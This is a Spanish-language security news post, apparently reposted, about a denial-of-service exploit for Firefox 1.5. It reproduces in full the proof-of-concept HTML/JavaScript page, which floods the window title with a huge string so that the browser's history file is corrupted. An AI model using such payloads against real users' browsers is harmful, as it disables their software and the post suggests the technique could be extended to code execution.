Denegación de servicio (DoS) en Firefox 1.5


Se ha publicado un exploit para el nuevo Firefox 1.5, el cuál puede provocar una condición de denegación de servicio (DoS) luego que el usuario afectado visita una página web maliciosa.





El problema ocurre porque el archivo HISTORY.DAT que crea
Firefox, llega a almacenar una entrada excesivamente larga
luego que el navegador visualiza la página HTML que contiene
el exploit (un simple JavaScript).

Esto provoca que luego de cerrado el navegador, todas las
siguientes veces que el usuario intente acceder a él, el
programa se negará a responder.

Esta situación se mantendrá hasta que el archivo HISTORY.DAT
sea borrado manualmente.

El autor del exploit advierte que una modificación del mismo,
podría servir para la ejecución de código.


* Más información:

Firefox 1.5 buffer overflow
http://packetstormsecurity.org/0512-exploits/firefox-1.5-buffer-overflow.txt

Fuente del exploit

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>


* Créditos:

ZIPLOCK <sickbeatz[arroba]gmail.com>

Fuente:
Por Angela Ruiz
vsantivirus.com



Otras noticias de interés:

Google advierte de una infección de malware
Google está utilizando su motor de búsquedas para advertir a los usuarios que podrían tener sus equipos infectados con un software que interceptaría su conexión a Google.com y otros sites....
Aplicaciones Portable necesarias en nuestros dispositivos
Herramientas o aplicaciones portables, ya sea en una unidad flash USB, iPod, disco duro portátil, etc. Todas las que serán nombradas son de código abierto y funcionan en cualquier sistema operativo y bajo cualquier hardware. ...
Vulnerabilidad de Exchange permite intervenir un servidor enviando un e-mail
Al enviar mensajes de correo electrónico a un servidor Microsoft Exchange es posible asumir el control del sistema. Microsoft advierte sobre una grave vulnerabilidad en todas las versiones de Exchange. ...
Buffer Overflow /Font en mIRC
Se ha descubierto una nueva vulnerabilidad en el mIRC que consiste en un buffer overflow que puede ser explotado para ejecutar comandos en los sistemas que posean éste programa....
Los teléfonos y los teclados de ordenador quedarán obsoletos en diez años
Los teléfonos y los teclados de ordenador quedarán obsoletos en diez años porque el perfeccionamiento de los sistemas de tratamiento de voz, así como las previstas mejoras de la capacidad de los ordenadores, producirán un profundo cambio en el a...
Múltiples vulnerabilidades en Microsoft Windows Media
Dentro del conjunto de boletines de seguridad de diciembre publicado este martes por Microsoft y del que ya efectuamos un resumen, se cuenta el anuncio (en el boletín MS08-076) de una actualización para Microsoft Windows Media destinada a soluciona...
Microsoft investiga fuga del código fuente de Windows
Microsoft está investigando una posible y grave brecha en su seguridad, que podría haber permitido que se liberara en Internet, el código fuente de su sistema operativo Windows 2000 (o parte de él). Las porciones del código que dicen haber sid...
Adobe publica parches de seguridad
Múltiples vulnerabilidades fueron identificadas y reportadas por diferentes fuentes a Adobe. Los programas afectados son Adobe Flash Player y Photoshop, todas ellas catalogadas como críticas. ...
IBM colaborará con OpenOffice.org
OpenOffice.org ha anunciado que contará con la colaboración de IBM para desarrollar y promover la tecnología de su suite OpenOffice.org. La primera de las compañías aportará inicialmente código desarrollado como parte de Lotus Notes, incluyend...
Prot-On: Aplicación que protege archivos compartidos en Internet
El usuario decide en tiempo real quién, cómo y cuándo accede a su información. En una sociedad digital, en la que cada vez más la documentación en papel desaparece, los archivos se comparten por correo electrónico o se almacenan en la nube, y ...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • denegacion
  • dos
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • servicio
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra